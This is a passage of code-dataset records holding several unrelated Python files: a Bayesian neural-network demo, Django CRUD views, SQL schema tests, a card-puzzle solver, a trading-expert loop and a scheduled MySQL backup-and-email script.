data points.\n @param low low boundary of data points.\n @param high high boundary of data points.\n @param bias bias of the function.\n @param noise_level noise level of the function.\n\n @return N-dimentional target vector of stochastic process values.\n \"\"\"\n\n x = np.random.uniform(low, high, size = N)\n t = groundTruthProcess(x, bias, func) + np.random.normal(0, noise_level, size = N)\n return x, t\n\ndef trainTestSplit(X, t, test_rate = 0.2):\n N = X.shape[0]\n rand_idx = np.random.choice(N, N, replace = False)\n valid_idx = rand_idx[:int(N * test_rate)]\n train_idx = rand_idx[int(N * test_rate):]\n return X[train_idx], t[train_idx], X[valid_idx], t[valid_idx]\n\n\nclass SimpleFeedForwardNetwork():\n \"\"\"Simple two-layer (hidden + output) feed-forward neural network\n performing regression for one target variable.\n \"\"\"\n\n def __init__(self, NHiddenUnits) -> None:\n biasUnit = 1\n self.inputDim = 1 + biasUnit\n self.NInputUnits = 1 + biasUnit\n self.NHiddenUnits = NHiddenUnits + biasUnit\n self.NOutputUnits = 1\n self.w1 = np.random.normal(0.0, 0.2, size = (self.inputDim, self.NHiddenUnits))\n self.w2 = np.random.normal(0.0, 0.2, size = (self.NHiddenUnits, self.NOutputUnits))\n self.totalW = self.w1.size + self.w2.size\n self.W = np.zeros(self.totalW, dtype = np.float32)\n self.A = np.zeros((self.totalW, self.totalW), dtype = np.float32)\n self.al = 0.0\n self.bt = 1.0\n self.lmbd = 0.0\n\n def fit(self, X, t, epochs = 100, batch_size = 32, learning_rate = 0.1, lmbd = 0.0, al = 0.0, bt = 1.0, verbose = False):\n \"\"\"Trains network using SGD.\n\n @param X NxD feature matrix of input data.\n @param t N-dimentional target vector of input data.\n @param epochs epoch number.\n @param batch_size batch number.\n @param learning_rate learning rate for SGD.\n @param lmbd regularization coefficient.\n @param al precision (inverse variance) of the prior weight distribution.\n @param bt precision (inverse variance) of input data.\n @param verbose do print detailed info.\n \"\"\"\n\n self.al = al\n self.bt = bt\n self.lmbd = lmbd\n\n verboseInterval = epochs // 20\n if verboseInterval == 0:\n verboseInterval = 1\n\n N = X.size // self.inputDim\n X_train, t_train, X_valid, t_valid = trainTestSplit(X, t)\n for e in range(epochs):\n y_pred = np.zeros_like(t_train)\n for n, (x, tn) in enumerate(zip(X_train, t_train)):\n y, z = self.forward(x)\n y_pred[n] = y\n w1_grad, w2_grad = self.backward(y, tn, z, x)\n self.w1 = self.w1 - learning_rate * (w1_grad + self.lmbd * self.w1)\n self.w2 = self.w2 - learning_rate * (w2_grad + self.lmbd * self.w2)\n\n # rand_idx = np.random.choice(N, N, replace = False)\n # train_idx = rand_idx[:int(N * 0.8)]\n # valid_idx = rand_idx[int(N * 0.8):]\n # y_pred = np.zeros_like(rand_idx)\n # t_pred = np.take(t, train_idx)\n\n # iterNum = N // batch_size\n # w1_grad = np.zeros_like(self.w1)\n # w2_grad = np.zeros_like(self.w2) \n # for i in range(iterNum):\n # batch_rand_idx = rand_idx[i * batch_size : (i + 1) * batch_size]\n # for n in batch_rand_idx:\n # y, z = self.forward(X[n])\n # y_pred[n] = y\n # w1_grad_now, w2_grad_now = self.backward(y, t[n], z, X[n])\n # w1_grad += w1_grad_now\n # w2_grad += w2_grad_now\n # self.w1 -= learning_rate * w1_grad\n # self.w2 -= learning_rate * w2_grad\n\n # for n in train_idx:\n # y, z = self.forward(X[n])\n # y_pred[n] = y\n # w1_grad, w2_grad = self.backward(y, t[n], z, X[n])\n # self.w1 -= learning_rate * w1_grad\n # self.w2 -= learning_rate * w2_grad\n\n y_valid_pred = np.zeros_like(t_valid)\n for n, (x, tn) in enumerate(zip(X_valid, t_valid)):\n y, _ = self.forward(x)\n y_valid_pred[n] = y\n\n if verbose and e % verboseInterval == 0:\n loss = self.RMS(y_pred, t_train)\n valid_loss = self.RMS(y_valid_pred, t_valid)\n print(\">>> epoch {0}\".format(e), \"train loss (RMS): {0}\".format(loss), \"valid loss (RMS): {0}\".format(valid_loss), sep = ', ')\n\n # Combine all weights into one vector for convenience\n self.W = np.concatenate((self.w1.flatten(), self.w2.flatten()))\n\n # Evaluate posterior distribution parameters\n _, self.A = self.wPosteriorParams(X, t)\n\n def forward(self, x):\n \"\"\"Computes forward propagation.\n\n @param x D-dimentional vector of input data.\n\n @return Network output.\n \"\"\"\n \n a = np.zeros(self.NHiddenUnits, dtype = np.float32)\n for j in range(self.NHiddenUnits):\n for i in range(self.NInputUnits):\n a[j] += self.w1[i, j] * x[i]\n\n z = np.tanh(a)\n\n y = np.zeros(self.NOutputUnits, dtype = np.float32)\n for k in range(self.NOutputUnits):\n for j in range(self.NHiddenUnits):\n y[k] += self.w2[j, k] * z[j]\n return y, z\n\n def backward(self, y, t, z, x):\n \"\"\"Computes backward propagation.\n\n @param y network output.\n @param t ground-truth target.\n @param z hidden activation output.\n @param x network input.\n\n @return Weight gradients.\n \"\"\"\n\n delta_output = (y - t)\n\n delta_hidden = np.zeros(self.NHiddenUnits, dtype = np.float32)\n for j in range(self.NHiddenUnits):\n for k in range(self.NOutputUnits):\n delta_hidden[j] += self.w2[j, k] * delta_output\n delta_hidden *= (1 - z**2)\n\n w1_grad = np.zeros_like(self.w1)\n for j in range(w1_grad.shape[1]):\n for i in range(w1_grad.shape[0]):\n w1_grad[i, j] = delta_hidden[j] * x[i]\n\n w2_grad = np.zeros_like(self.w2)\n for k in range(w2_grad.shape[1]):\n for j in range(w2_grad.shape[0]):\n w2_grad[j, k] = delta_output[k] * z[j]\n\n # w1_grad = np.outer(x, delta_hidden)\n # w2_grad = np.outer(z, delta_output)\n return w1_grad, w2_grad\n\n def calculateHessian(self, X, t):\n \"\"\"Evaluates Hessian by Outer Product Approximation.\n \n @param X NxD feature matrix of input data.\n @param t N-dimentional target vector of input data.\n\n @return Hessian matrix.\n \"\"\"\n\n Hessian = np.zeros((self.totalW, self.totalW), dtype = np.float32)\n\n for n, (x, tn) in enumerate(zip(X, t)):\n\n # Get ∇y\n y, z = self.forward(x)\n delta_hidden = np.zeros(self.NHiddenUnits, dtype = np.float32)\n for j in range(self.NHiddenUnits):\n for k in range(self.NOutputUnits):\n delta_hidden[j] += self.w2[j, k]\n delta_hidden *= (1 - z**2)\n w1_grad = np.zeros_like(self.w1)\n for j in range(w1_grad.shape[1]):\n for i in range(w1_grad.shape[0]):\n w1_grad[i, j] = delta_hidden[j] * x[i]\n w2_grad = np.zeros_like(self.w2)\n for k in range(w2_grad.shape[1]):\n for j in range(w2_grad.shape[0]):\n w2_grad[j, k] = z[j]\n\n # Approximate Hessian\n b = np.concatenate((w1_grad.flatten(), w2_grad.flatten()))\n Hessian += np.outer(b, b.T)\n \n return Hessian\n\n def wPosteriorParams(self, X, t, al = 0.0, bt = 0.0):\n \"\"\"Evaluates p(w|α) parameters by local Gaussian approximation.\n \n @param X NxD feature matrix of input data.\n @param t N-dimentional target vector of input data.\n @param al precision (inverse variance) of the prior weight distribution.\n @param bt precision (inverse variance) of input data.\n\n @return p(w|α) parameters.\n \"\"\"\n\n Hessian = self.calculateHessian(X, t)\n\n al = self.al if al == 0.0 else al\n bt = self.bt if bt == 0.0 else bt\n A = al * np.identity(self.totalW) + bt * Hessian\n\n return Hessian, A\n\n def hyperparameterOptimization_experimental(self, X, t, a0, b0):\n\n N = t.size\n a = a0\n b = b0\n\n eps = 10**-2\n doStop = False\n aFound = False\n bFound = False\n itr = 0\n maxIter = 100\n while not doStop and itr < maxIter:\n a_prev = a\n b_prev = b\n lmbd = a / b\n\n # Calculate γ\n H, A = self.wPosteriorParams(X, t)\n eig_w, _ = LA.eig( b * H )\n\n # Update α\n gamma = np.sum( eig_w / (a + eig_w) )\n a = gamma / (self.W.T @ self.W)\n\n # Update β\n sum_of_sq = 0.0\n for i in range(N):\n sum_of_sq += (t[i] - float(self.forward(X[i])[0]))**2\n b = 1 / ( (1 / (N - gamma)) * sum_of_sq )\n\n dff1 = np.abs(a - a_prev)\n dff2 = np.abs(b - b_prev)\n if dff1 < eps:\n aFound = True\n if dff2 < eps:\n bFound = True\n if aFound and bFound:\n doStop = True\n itr += 1\n\n return a, b\n\n def predictBayesian(self, x):\n \"\"\"Computes predictive distribution p(t|x, D, α, β).\n\n @param x new unobserved data point.\n\n @return Estimated mean and sigma of the predictive distribution\n \"\"\"\n\n y, z = self.forward(x)\n\n delta_hidden = np.zeros(self.NHiddenUnits, dtype = np.float32)\n for j in range(self.NHiddenUnits):\n for k in range(self.NOutputUnits):\n delta_hidden[j] += self.w2[j, k]\n delta_hidden *= (1 - z**2)\n\n w1_grad = np.zeros_like(self.w1)\n for j in range(w1_grad.shape[1]):\n for i in range(w1_grad.shape[0]):\n w1_grad[i, j] = delta_hidden[j] * x[i]\n\n w2_grad = np.zeros_like(self.w2)\n for k in range(w2_grad.shape[1]):\n for j in range(w2_grad.shape[0]):\n w2_grad[j, k] = z[j]\n\n g = np.concatenate((w1_grad.flatten(), w2_grad.flatten()))\n sigma2 = 0.0000001\n if LA.det(self.A) > 0:\n A_inv = LA.inv(self.A)\n sigma2 = 1/self.bt + g.T @ A_inv @ g\n\n return y, np.sqrt(sigma2)\n\n def loss(self, y, t):\n \"\"\"Computes sum-of-squares loss function.\n\n @param y network output.\n @param t ground-truth target.\n\n @return loss.\n \"\"\"\n\n return np.sum( (y - t)**2 ) / 2\n\n def RMS(self, y, t):\n \"\"\"Computes root-mean-square function.\n\n @param y network output.\n @param t ground-truth target.\n\n @return loss.\n \"\"\"\n\n N = t.size\n return np.sqrt( (2 * self.loss(y, t)) / N )","repo_name":"matkovst/Bishop-PRML-demos","sub_path":"05-Neural-Networks/model_specific.py","file_name":"model_specific.py","file_ext":"py","file_size_in_byte":12266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"28518948510","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Cliente\nfrom .forms import ClienteForm, CadastroForm\nfrom django.contrib.auth.decorators import login_required\nimport requests\n\ndef home(request):\n response = requests.get('viacep.com.br/ws/%s/json')\n print(response)\n\n\n\ndef usuarioCreate(request):\n form = CadastroForm(request.POST or None)\n\n if form.is_valid():\n form.save()\n return redirect('clienteList')\n\n return render(request, 'registration/cadastro.html', {'form': form})\n\n'''Importando login required para pedir login\n quem entrar como admin vai poder ver.\n '''\n\n@login_required\ndef clienteList(request):\n clientes = Cliente.objects.all()\n\n return render(request, 'clienteList.html', {'clientes': clientes})\n\n\n@login_required\ndef clienteCreate(request):\n form = ClienteForm(request.POST or None)\n\n if form.is_valid():\n form.save()\n return redirect('clienteList')\n\n return render(request, 'clienteCreate.html', {'form': form})\n\n\n@login_required\ndef clienteUpdate(request, id):\n cliente = get_object_or_404(Cliente, pk=id)\n form = ClienteForm(request.POST or None, instance=cliente)\n\n if form.is_valid():\n form.save()\n return redirect('clienteList')\n\n return render(request, 'clienteCreate.html', {'form': form})\n\n\n@login_required\ndef clienteDelete(request, id):\n cliente = get_object_or_404(Cliente, pk=id)\n\n if request.method == 'POST':\n cliente.delete()\n return redirect('clienteList')\n\n return render(request, 'clienteDelete.html', {'cliente': cliente})\n\n@login_required\ndef clienteRead(request, id):\n cliente = get_object_or_404(Cliente, pk=id)\n form = ClienteForm(request.POST or None, instance=cliente)\n\n return render(request, 'clienteRead.html', {'cliente': cliente, 'form': form})\n\n\n\n'''Função de cadastro'''\n\ndef cadastro(request):\n if request.method == 'POST':\n form = CadastroForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('home')\n else:\n form = CadastroForm()\n return render(request, 'registration/cadastro.html', {'form': form})\n\n","repo_name":"Tallesecs/WebSite-para-cadastros-utilizando-APIS","sub_path":"clienteApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"26394639367","text":"from sqlschm import sql\n\nTABLE_A = sql.Table(\n name=(\"A\",),\n columns=(sql.Column(name=\"a\"),),\n constraints=(sql.Uniqueness(indexed=(sql.Indexed(column=\"a\"),), is_primary=True),),\n)\nTABLE_B = sql.Table(\n name=(\"B\",),\n columns=(sql.Column(name=\"b\"),),\n constraints=(sql.Uniqueness(indexed=(sql.Indexed(column=\"b\"),), is_primary=True),),\n)\nFK_A = sql.ForeignKey(columns=(\"a\",), foreign_table=(\"A\",), referred_columns=(\"a\",))\nFK_B = sql.ForeignKey(columns=(\"b\",), foreign_table=(\"B\",))\nTABLE_C = sql.Table(\n name=(\"C\",),\n columns=(sql.Column(name=\"a\"), sql.Column(name=\"b\")),\n constraints=(\n sql.Uniqueness(\n indexed=(sql.Indexed(column=\"a\"), sql.Indexed(column=\"b\")), is_primary=True\n ),\n FK_A,\n FK_B,\n ),\n)\nFK_C = sql.ForeignKey(\n columns=(\"x\", \"y\"),\n foreign_table=(\"C\",),\n referred_columns=(\"b\", \"a\"),\n)\nTABLE_D = sql.Table(\n name=(\"D\",),\n columns=(sql.Column(name=\"x\"), sql.Column(name=\"y\")),\n constraints=(\n sql.Uniqueness(\n indexed=(sql.Indexed(column=\"x\"), sql.Indexed(column=\"y\")), is_primary=True\n ),\n FK_C,\n ),\n)\nSYMBOLS = {\n \"A\": TABLE_A,\n \"B\": TABLE_B,\n \"C\": TABLE_C,\n \"D\": TABLE_D,\n}\nSCHEMA = sql.Schema(items=(TABLE_A, TABLE_B, TABLE_C, TABLE_D))\n\n\ndef test_symbols() -> None:\n assert sql.symbols(SCHEMA) == SYMBOLS\n\n\ndef test_referred_columns() -> None:\n assert sql.referred_columns(FK_A, SYMBOLS) == (\"a\",)\n assert sql.referred_columns(FK_B, SYMBOLS) == (\"b\",)\n assert sql.referred_columns(FK_C, SYMBOLS) == (\"b\", \"a\")\n\n\ndef test_resolve_foreign_key() -> None:\n assert tuple(sql.resolve_foreign_key(FK_A, \"a\", SYMBOLS)) == (\"a\",)\n assert tuple(sql.resolve_foreign_key(FK_B, \"b\", SYMBOLS)) == (\"b\",)\n assert tuple(sql.resolve_foreign_key(FK_C, \"x\", SYMBOLS)) == (\n FK_B,\n \"b\",\n )\n assert tuple(sql.resolve_foreign_key(FK_C, \"y\", SYMBOLS)) == (\n FK_A,\n \"a\",\n )\n","repo_name":"coast-team/sqlschm","sub_path":"tests/test_sql.py","file_name":"test_sql.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"65"} +{"seq_id":"25636764154","text":"\nimport itertools\n\n\ndef create_board(permutation):\n board = {}\n for i in range(len(permutation)):\n board[i] = permutation[i]\n return board\n\ndef print_board(board):\n print(\"\\t\\t{}\\t\\t\".format(board[0]))\n print(\"{}\\t{}\\t{}\\t\\t\".format(board[1], board[2], board[3]))\n print(\"\\t{}\\t{}\\t{}\\t\".format(board[4], board[5], board[6]))\n print(\"\\t\\t{}\\t\\t\".format(board[7]))\n\ndef print_solutions(solutions):\n for solution in solutions:\n print(\"Found solution after {} iterations\".format(solution[1]))\n print_board(solution[0])\n print(\"Found {} solutions\".format(len(solutions)))\n\n\ndef create_permutations():\n cards = ['A', 'A', 'H', 'H', 'V', 'V', 'B', 'B']\n permutations = set(itertools.permutations(cards))\n return permutations\n\ndef get_neighbors(board, i):\n neighbors = {\n 0: [3], \n 1: [2], \n 2: [1, 3, 4],\n 3: [0, 2, 5],\n 4: [2, 5],\n 5: [3, 4, 6, 7],\n 6: [5],\n 7: [5],\n }\n return [board[n] for n in neighbors[i]]\n\n\ndef test_card(card, neighbors):\n if card in neighbors:\n # twee kaarten van dezelfde soort mogen geen buren zijn\n return False\n if card == 'A':\n if 'V' in neighbors:\n # elke Aas grenst NIET aan een Vrouw\n return False\n elif not 'H' in neighbors:\n # elke Aas grenst aan een Heer\n return False\n if card == 'H' and not 'V' in neighbors:\n # elke Heer grenst aan een Vrouw\n return False\n if card == 'V' and not 'B' in neighbors:\n # elke Vrouw grenst aan een Boer\n return False\n # kaart grenst niet aan de juiste kaart\n return True\n\ndef test_board(board):\n for index in board.keys():\n neighbors = get_neighbors(board, index)\n card = board[index]\n if not test_card(card, neighbors):\n return False\n return True\n\ndef test_all():\n permutations = create_permutations()\n iterations_count = 0\n solutions = []\n for permutation in permutations:\n iterations_count += 1\n board = create_board(permutation) \n if test_board(board):\n if not board in solutions:\n solutions.append((board, iterations_count))\n print_solutions(solutions)\n\ntest_all()\n\n# A. \n# 1. Er zijn 2520 permutaties mogelijk \n# 2. Er moeten 1582 iteraties worden gedaan voor de eerste oplossing is gevonden\n","repo_name":"angelo-wf/Exercises-Hanze-4","sub_path":"AI/week3/opdracht2a.py","file_name":"opdracht2a.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43805532635","text":"import time\n\nimport numpy as np\nimport os\n\nfrom data.data_manager import get_data_chunk\nfrom expert.basic_expert import Expert, Action\nfrom trading import TradeAction\nfrom trading_expert.trail_on_error import TrailOnErrorDecision\n\ndisplay = True\n\n\nclass TradingExpert(Expert):\n\n def after_init(self):\n self.abilities.append(TrailOnErrorDecision())\n\n\ntradingExpert = TradingExpert(strike_step=3)\n\npair_name = \"EURUSD\"\ninterval = \"1.mini\"\n\ndirname = os.path.dirname(__file__)\nbase_path = dirname + \"\"\n\ndf_csv = get_data_chunk(pair_name, interval, 2048)\n\nrisk_factor = 0.0002\n\n\ndef calculate_certainty(diff):\n certainty = 0.0\n decision_val = abs(diff) / risk_factor\n # print(decision_val)\n if decision_val >= 3:\n certainty = 1\n elif decision_val >= 2:\n certainty = 0.8\n elif decision_val >= 1:\n certainty = 0.6\n else:\n certainty = 0.4\n\n return certainty\n\n\ndef calculate_result(__states):\n # print(states)\n f_step = __states[:1, 4:5] # using close value\n l_step = __states[-1:, 4:5] # using close value\n\n diff = f_step - l_step\n if diff == 0:\n certainty = 1\n action_type = TradeAction.STAY\n else:\n certainty = calculate_certainty(diff)\n if diff > 0:\n action_type = TradeAction.SELL\n else:\n action_type = TradeAction.BUY\n\n __action = Action.action_gen(action_type, certainty)\n\n # print(f_step, l_step, diff, diff > 0, calculate_certainty(diff))\n # print(__action)\n # time.sleep(0.5)\n\n return __action\n\n\nif __name__ == '__main__':\n print(\"Expert working\")\n last_result = -1\n\n for df in df_csv:\n step_count = 0\n\n next_strike = 0\n states = []\n print(df.head())\n print(tradingExpert.status())\n\n for df_row in df.values:\n df_values = df_row\n\n states.append(df_values)\n\n if step_count == next_strike:\n states = np.array(states)\n result = calculate_result(states)\n\n # tradingExpert.feedback(result=result, state=states)\n action, strike_on = tradingExpert.interact(states, result)\n\n next_strike = step_count + strike_on\n act_state = df_values\n next_action = action\n ## States after action taken\n states = []\n # states.append(df_values)\n\n step_count += 1\n if display:\n time.sleep(0.2)\n","repo_name":"ceylon-ai-projects/expertsystem","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"40561379181","text":"# coding:utf-8\nimport os\nimport time\nimport datetime\nimport sched\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\n# 第一个参数确定任务的时间,返回从某个特定的时间到现在经历的秒数\n# 第二个参数以某种人为的方式衡量时间\nschedule = sched.scheduler(time.time, time.sleep)\n\n\ndef backupsDB():\n # 如果是linux改下路径就可以了\n today = str(datetime.date.today())\n cmdString = 'D:/MariaDB/bin/mysqldump -u root --password=root --databases vip > d:/test_backup/vip_'+today+'.sql'\n # print('cmdStr:%s' %cmdString)\n os.system(cmdString)\n\n\ndef sendMail():\n _user = \"\" # 发送者的邮箱\n _pwd = \"\" # 邮箱授权码\n _to = \"\" # 接收者的邮箱\n # 如名字所示Multipart就是分多个部分\n msg = MIMEMultipart()\n msg[\"Subject\"] = \"数据库备份\"\n msg[\"From\"] = _user\n msg[\"To\"] = _to\n # ---这是文字部分---\n part = MIMEText(\"数据库备份\")\n msg.attach(part)\n # ---这是附件部分---\n # 类型附件\n part = MIMEApplication(open('D:/test_backup/vip.sql', 'rb').read())\n part.add_header('Content-Disposition', 'attachment',\n filename=\"abc_backup.sql\")\n msg.attach(part)\n s = smtplib.SMTP(\"smtp.qq.com\", timeout=30) # 连接QQ邮件服务器,端口默认是25\n s.login(_user, _pwd) # 登陆服务器\n s.sendmail(_user, _to, msg.as_string()) # 发送邮件\n s.close()\n\n\ndef perform_command(cmd, inc):\n # 安排inc秒后再次运行自己,即周期运行\n schedule.enter(inc, 0, perform_command, (cmd, inc))\n os.system(cmd)\n backupsDB()\n sendMail()\n\n\ndef timming_exe(cmd, inc=60):\n # enter用来安排某事件的发生时间,从现在起第n秒开始启动\n schedule.enter(inc, 0, perform_command, (cmd, inc))\n # 持续运行,直到计划时间队列变成空为止\n schedule.run()\n\n\nif __name__ == '__main__':\n print(\"show time after 10 seconds:\")\n timming_exe(\"echo %time%\", 112800) # 每间隔56400秒备份发送邮件\n # perform_command(\"echo %time%\", 10)\n # 46400 基本上是半天\n","repo_name":"hey-xuc/python-","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"13287022715","text":"import numpy as np\nimport scipy.sparse as sp\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport sys\n\nimport utils\n\n\nclass Light_GCN(nn.Module):\n def __init__(self, hyper_parameter_dict, args, user_le, item_le, train_df, device, graph):\n super(Light_GCN, self).__init__()\n self.args = args\n\n self.n_user = len(user_le.classes_)\n self.n_item = len(item_le.classes_)\n\n self.user_le = user_le\n self.item_le = item_le\n self.train_df = train_df\n\n self.device = device\n\n self.embed_size = hyper_parameter_dict['model']['embed_size']\n self.num_layers = hyper_parameter_dict['model']['num_layers']\n self.num_folds = hyper_parameter_dict['model']['num_folds']\n self.node_dropout = hyper_parameter_dict['model']['node_dropout']\n\n self.split = args['model']['split']\n\n self.Graph = graph\n\n self.build_graph()\n\n def build_graph(self):\n self.user_embedding = nn.Embedding(self.n_user, self.embed_size)\n self.item_embedding = nn.Embedding(self.n_item, self.embed_size)\n\n nn.init.normal_(self.user_embedding.weight, 0, 0.01)\n nn.init.normal_(self.item_embedding.weight, 0, 0.01)\n\n self.to(self.device)\n\n def lightgcn_embedding(self, graph):\n users_emb = self.user_embedding.weight\n items_emb = self.item_embedding.weight\n all_emb = torch.cat([users_emb, items_emb], dim=0)\n\n embs = [all_emb]\n\n g_droped = graph\n\n ego_emb = all_emb\n for k in range(self.num_layers):\n if self.split:\n tmp_emb = []\n for f in range(len(g_droped)):\n tmp_emb.append(torch.sparse.mm(g_droped[f], ego_emb))\n side_emb = torch.cat(tmp_emb, dim=0)\n all_emb = side_emb\n\n else:\n all_emb = torch.sparse.mm(g_droped, all_emb)\n embs.append(all_emb)\n\n embs = torch.stack(embs, dim=1)\n lightgcn_out = torch.mean(embs, dim=1)\n users, items = torch.split(lightgcn_out, [self.n_user, self.n_item])\n\n return users, items\n\n # def make_train_matrix(self, train_df, args):\n # rows, cols = train_df[args['data']['columns']\n # [0]], train_df[args['data']['columns'][1]]\n # values = train_df[args['data']['columns'][2]]\n\n # sp_data = sp.csr_matrix(\n # (values, (rows, cols)), dtype='float64', shape=(self.n_user, self.n_item))\n # self.train_matrix = sp_data\n\n # def _split_A_hat(self, A):\n # A_fold = []\n # fold_len = (self.n_user + self.n_item) // self.num_folds\n\n # for i_fold in range(self.num_folds):\n # start = i_fold * fold_len\n # if i_fold == self.num_folds - 1:\n # end = self.n_user + self.n_item\n # else:\n # end = (i_fold + 1) * fold_len\n # A_fold.append(self._convert_sp_mat_to_sp_tensor(\n # A[start:end]).coalesce().to(self.device))\n\n # return A_fold\n\n # def _convert_sp_mat_to_sp_tensor(self, X):\n # coo = X.tocoo().astype(np.float32)\n # row = torch.Tensor(coo.row).long()\n # col = torch.Tensor(coo.col).long()\n # index = torch.stack([row, col])\n # data = torch.FloatTensor(coo.data)\n # return torch.sparse.FloatTensor(index, data, torch.Size(coo.shape))\n\n # def getSparseGraph(self):\n # n_users, n_items = self.train_matrix.shape\n\n # adj_mat = sp.dok_matrix(\n # (n_users + n_items, n_users + n_items), dtype=np.float32)\n # adj_mat = adj_mat.tolil()\n\n # R = self.train_matrix.tolil()\n\n # adj_mat[:n_users, n_users:] = R\n # adj_mat[n_users:, :n_users] = R.T\n # adj_mat = adj_mat.todok()\n\n # rowsum = np.array(adj_mat.sum(axis=1))\n # d_inv = np.power(rowsum, -0.5).flatten()\n # d_inv[np.isinf(d_inv)] = 0.\n # d_mat = sp.diags(d_inv)\n\n # norm_adj = d_mat.dot(adj_mat)\n # norm_adj = norm_adj.dot(d_mat)\n # norm_adj = norm_adj.tocsr()\n\n # if self.split == True:\n # Graph = self._split_A_hat(norm_adj)\n\n # else:\n # Graph = self._convert_sp_mat_to_sp_tensor(norm_adj)\n # Graph = Graph.coalesce().to(self.device)\n\n # return Graph\n\n def predict_batch_users(self, user_ids):\n user_embeddings = F.embedding(user_ids, self.user_embedding_pred)\n item_embeddings = self.item_Embedding_pred\n return np.matmul(user_embeddings, item_embeddings.T)\n\n def foward(self, user, item):\n u_embedding, i_embedding = self.lightgcn_embedding(self.Graph)\n\n user_latent = F.embedding(user, u_embedding)\n item_latent = F.embedding(item, i_embedding)\n\n score = torch.mul(user_latent, item_latent).sum(1)\n\n return score\n","repo_name":"yswSlamDunk/Recommendation-System","sub_path":"Graph/3.Light_GCN_bookcrossing/model/model_Light_GCN.py","file_name":"model_Light_GCN.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"28976280936","text":"#! /home/oberon/anaconda3/bin/python\nfrom termcolor import colored\n\n\ndef get_args():\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'project',\n nargs='+',\n type=str,\n help='Project name you want to create'\n )\n\n args = parser.parse_args()\n return args.project\n\n\ndef mk_structure(name):\n import os\n\n structure = {\n 'root' : name,\n 'build': os.path.join(name, 'build')\n }\n\n for directory in structure.values():\n if not os.path.exists(directory):\n try:\n os.makedirs(directory)\n except OSError as e:\n print(e)\n return False\n\n return True\n\n\ndef mk_sample(name):\n import os.path\n\n sample_path = os.path.join(name, name + '.cpp')\n\n sample = {\n 'copyright':\n '// Copyright 2019 SnesarevMS\\n' +\n '\\n',\n\n 'includes' :\n '#include \"opencv2/opencv.hpp\"\\n' +\n '#include \"opencv2/highgui/highgui.hpp\"\\n' +\n '\\n',\n\n 'namespace':\n 'using namespace cv;\\n' +\n '\\n',\n\n 'main':\n 'int main(int argc, char** argv) {\\n' +\n ' // create a gui window:\\n' +\n ' namedWindow(\"Output\", 1);\\n' +\n '\\n' +\n ' // wait for the user to press any key:\\n' +\n ' waitKey(0);\\n' +\n '\\n' +\n ' return 0;\\n' +\n '}' +\n '\\n'\n }\n\n try:\n with open(sample_path, 'w+') as file:\n for part in sample.values():\n file.write(part)\n except EnvironmentError:\n return False\n\n return True\n\n\ndef mk_cmake(name):\n import os.path\n\n cmake_path = os.path.join(name, 'CMakeLists.txt')\n\n cmake = {\n 'version':\n 'cmake_minimum_required(VERSION 3.13)\\n' +\n '\\n',\n\n 'project':\n 'project(' + name + ')\\n' +\n '\\n',\n\n 'opencv':\n 'find_package(OpenCV REQUIRED)\\n' +\n '\\n'\n 'message(\"opencv version: \" ${OpenCV_VERSION})\\n' +\n '\\n'\n 'include_directories(${OpenCV_INCLUDE_DIRS})\\n' +\n '\\n',\n\n 'executable': 'add_executable(' + name + '.o ' + name + '.cpp)\\n' +\n '\\n',\n\n 'links':\n 'target_link_libraries(' + name + '.o ${OpenCV_LIBS})\\n' +\n '\\n',\n\n 'run':\n 'add_custom_target(run\\n' +\n ' COMMAND ' + name + '.o\\n' +\n ' DEPENDS ' + name + '.o\\n' +\n ' WORKING_DIRECTORY ${CMAKE_PROJECT_DIR}\\n' +\n ')' +\n '\\n',\n }\n\n try:\n with open(cmake_path, 'w+') as file:\n for part in cmake.values():\n file.write(part)\n except EnvironmentError:\n return False\n\n return True\n\n\ndef call_run(project):\n import subprocess\n\n return subprocess.call(['./run ' + project], shell=True)\n\n\ndef main():\n steps = {\n 0: {\n 'Function' : mk_structure,\n 'Description': ' Preparing project ' + colored('structure', color='yellow') + '...'\n },\n 1: {\n 'Function' : mk_sample,\n 'Description': ' Generating ' + colored('template', color='yellow') + '...'\n },\n 2: {\n 'Function' : mk_cmake,\n 'Description': ' Generating ' + colored('CMakeLists.txt', color='yellow') + ' file' + '...'\n }\n }\n\n projects = get_args()\n\n for project in projects:\n print()\n print(' Setting up ' + colored(project, color='yellow') + '...')\n print()\n\n for step in steps.values():\n out = step['Description']\n wait = ((50 - len(out)) * \" \" + \"[\" + colored(\" WAIT \", 'yellow') + \"]\\n\")\n ok = ((50 - len(out)) * \" \" + \"[\" + colored(\" OK \", 'green') + \"]\\n\")\n fail = ((50 - len(out)) * \" \" + \"[\" + colored(\" FAILED \", 'red') + \"]\\n\")\n\n print(out, end=wait)\n if step['Function'](project):\n print(out, end=ok)\n print()\n else:\n print(out, end=fail)\n print()\n break\n\n call_run(projects[len(projects) - 1])\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"maxim1317/opencv-lab","sub_path":"scripts/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"16331865922","text":"\"\"\"Control the wifi connections of the device.\"\"\"\r\nimport logging\r\nimport subprocess\r\nfrom typing import List, 